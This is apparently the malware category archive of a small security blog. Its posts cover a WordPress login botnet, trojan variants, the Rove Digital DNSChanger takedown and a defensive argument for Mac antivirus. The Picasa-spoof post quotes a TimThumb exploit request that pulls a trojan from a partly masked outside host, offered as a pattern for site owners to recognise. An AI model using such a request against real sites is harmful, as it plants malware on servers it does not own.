Category Archives: Malware
Malware, Trojans, Virus, Internet Security
Massive Number of Hacked USA Websites Participate in WordPress Botnet Attack
For the past couple of days we’ve been watching a customers WordPress site being attacked by a botnet of websites trying to access site admin with user name “admin” and a variety of simple passwords.
Most of these attacks are coming from USA based web hosting services. One particular top level service provider, Provo Unified Layer, stands out above the rest as the most hacked network. Many 2nd tier providers use Provo Unified Layer infrastructure including Bluehost and Hostmonster. Of the hosts using Provo Unified Layer infrastructure, Bluehost is ahead of the pack in having hosted sites participating in the botnet. (Read more about Bluehost and the Botnet).
Googlebot Error with WPOnlineStore Plugin
Googlebot triggers a PHP Fatal Error ‘function.require‘ error causing the bot to receive a “500” internal server error when trying to crawl the pages created by the WordPress WPOnlineStore plugin. In my previous post I mentioned this ongoing problem. Today I can provide some additional information.
The problem is not unique to my shop site; initial searches of the internet found only a few references to this problem. for the past two days the hosting company server engineers have been looking into the problem, unfortunately without any success. After disabling Apache mod_secure settings, which appeared to be causing the error, Googlebot still triggered this error. As previously mentioned in Googlebot has Problems with WPOnlineStore, it is only Googlebot – and there lies the first clue.
Microsoft Security Essentials Under Microscope
A look at Microsoft Security Essentials, the free anti-virus application from Microsoft. Is Microsoft Security Essentials any good? Will it protect a Windows PC from most common threats? Can MSE compete with commercial security applications?
Over the next few months we will see.
Annoyed with Commercial AV Software.
I have become increasingly annoyed with commercial anti-virus applications. They have become overpriced, use too much system resources, interfere with other applications, or slow down internet access. Worse still, none of the apps are able to detect every virus or malware… An example is Trojan Generic 24, which seems to be only detected by AVG (but doesn’t stop or remove it). Trend Micro Titanium and Norton AV don’t find all versions of this dangerous trojan.
Hackers Using Picasa Spoof for Web Malware
Strange looking referer URLs and GET requests that appear to be Picasa are being used by hackers to find website vulnerabilities to inject malware or spam. Examining the details of the referer reveals something like this example /wp-content/themes/biznizz/thumb.php?src=http://picasa.com.jcibuenos*****.com.ar/2.php (stars replace the actual characters in string for your safety – leads nowhere). This particular example will inject malware using the WordPress TimThumb exploit. The file 2.php contains a trojan horse!
Picasa is of course picasa.google.com, but the similarity can lead the unwary to disregard the source. These strings are typically long, similar in appearance to a Google search request string. Any URL containing this odd string (or similar) should be regarded as extremely suspicious, and the IP should at least be checked for known bad behaviour and blocked from accessing the website. The string is often seen along with WordPress TimThumb exploit attempts.
Home Grown Malware?
It looks like Trojan tvwjfm.exe (with several other names too – list of known names and further information) could have originated from South Africa. At least the first reported infections came from this locale.
This makes a change to the norm where the largest percentage of new malware hails from the Asian Sub-Continent, although a tie-in to this region cannot be excluded.
This Trojan has not had a big impact; outbreaks so far seem to be limited, possibly deliberately targeting specific users. However, the few reported instances should not be taken to imply this Trojan is not dangerous – it is.
The file is unusually large for a Trojan, containing a package of other files. If run, it behaves like an application installer. Even if the install is cancelled, the Trojan installs other malware unknown to the PC user.
I have decided to unofficially name this Trojan (as yet it has no official name) the Soccer Trojan. It presents itself with an icon of a soccer ball superimposed over a PC display, similar to the image on the left, which is clearly an attempt to encourage followers of this ball game to run the file.
Hopefully the Soccer Trojan will remain obscure, and not spread. Our vigilance is required at this early stage to interdict the malware before it gets the opportunity to ‘go viral’ and escape into the wild.
Cyber-Criminals Arrested, US Offices Closed
A cyber criminal network operated by Estonian company Rove Digital was taken down on November 8 2011 in a combined effort involving the FBI (Federal Bureau of Investigation of the USA) and the Estonian Police in co-operation with Trend Micro.
Rove Digital operated a botnet consisting over four million (4 000 000) bots on computers infected with a class of malware known as ‘DNSChangers’. The infected systems will typically have their Domain Name Server (DNS) changed to point to foreign IP addresses.
Rove digital appears on the surface as a legitimate business, with established offices in Tartu, Estonia. They are the parent company of several other operations, including Esthost, Estdomains, Cernel, UkrTelegroup and many less well-known shell companies.
Rove Digital used a variety of criminal methods to earn money from the DNS changers. The cyber crime network has operated from 2006.
Operation Ghost Click
Hacking Attempt from IP 188.8.131.52/8
An unsuccessful attempt to hack my website graphicline.co.za was made Friday 21 October 2011 shortly before 15h00 SAST (13h00 GMT).
The attempt was first identified by repeated 404 ‘page not found’ and 403 ‘access forbidden’ messages resulting from the hacker using URLS while trying to get access to the server and website setup files, and to log-in to unauthorised and prohibited areas of the website and server. The server is set to send notifications to me of 404, 403 and similar errors.
The attack originated from a business on the corner of Jumeirah Road and Sheikh Rashid Road, Juneirah, Dubai, United Arab Emirates. The business is located in a warehouse or freight depot. Identified from the IP addresses used during the attack – IP 184.108.40.206 and 220.127.116.11. It appears two hackers were working simultaneously.
I should thank these ill intended persons for testing the security of the website and server. Each incident is an opportunity to examine security, to improve the strength of the server environment.
Article about Trojan Horse Generic24.cgol
I thought now would be a good time to post an update. The .cgol variety seems to have died down somewhat, however it seems everyday that a new version is detected. Recent references I found include;
- trojan generic 24 cjgk (also generic24.cjgk (20 Sept 2011)
- trojan Generic24.BRQA
- trojan Generic24.BRQD
- trojan Generic24.BRQF etc (Full list at AVG)
- Trojan Horse generic24.TSU (21 Sept 2011)
- trojan Generic24.BUOM
- Generic24.BVUA (22 Sept 2011)
- trojan generic24 pnt (12 Sept 2011)
- GENERIC 24.CPQJ (23 Sept 2011)
- trojan-generic24-aawj (12 Sept 2011)
- Trojan horse Generic24.CAVY (21 Sept 2011)
- GENERIC 24.CPQJ (23 Sept 2011)
- Generic24.BIVS (2 Sep 2011)
- Generic24.FLZ (05 Oct 2011)
- Trojan horse Generic24.PYB (01 Oct 2011)
- Generic24.ATJW (03 Sept 2011)
- Trojan horse Generic 24.WMQ (24 Sept 2011)
The list goes on; these are from recent forums and other articles found via a search engine, from Sept this year.
There are literally thousands of similar malware trojans with the name ‘generic’
One common factor is they are generally considered hacking malware, opening a backdoor to other viruses which capture personal information from the user of an infected PC.
Again I stress the importance of early intervention should one of these trojans infect your PC.
The removal tips at the above web address can be used to fix most early infections by looking for similar HKEY references to those mentioned for FireFox
Apple Macs do get Malware
How often do we still hear Mac users blithely proclaiming they have no need for Anti Virus software because Macs don’t get viruses. Well Mac users, those days are gone for good, if they ever existed at all.
The fact that what some regard as the world’s first virus, “Elk Cloner”, was a Mac virus seems to have exited people’s minds.
The hardness of Mac’s Unix core operating system perhaps makes it more difficult for malicious persons to write viruses and trojans for Macs. Also in the old days Mac users were a very small group of computers users, mainly professionals involved in the print and graphics industries, not a big enough target for virus creators to spend their time on.
Mac users have been complacent, secure in the expectation their systems are safe; At one time I was one of them. I used Macs for years with no AV software installed.
Recent Mac Viruses
These Mac Trojans are not however the end of the story. Consider all the file sharing between Mac and Windows users in the commercial world.
Macs can give Window Malware
Here is an example:
User A prepares work on a Mac. User A has no Anti Virus software because Macs are immune! Unknown to user A, a visit to a website has installed a Windows virus or trojan in a Word or Excel file. User A sends the file to user B, a Windows user. User B’s PC gets infected!
Or another example;
User A gets an e-mail containing malware and forwards it to User B. Once again User B’s PC gets infected.
Mac Users, break the malware chain, get your Macs protected. The days of Mac immunity to malware are gone for ever.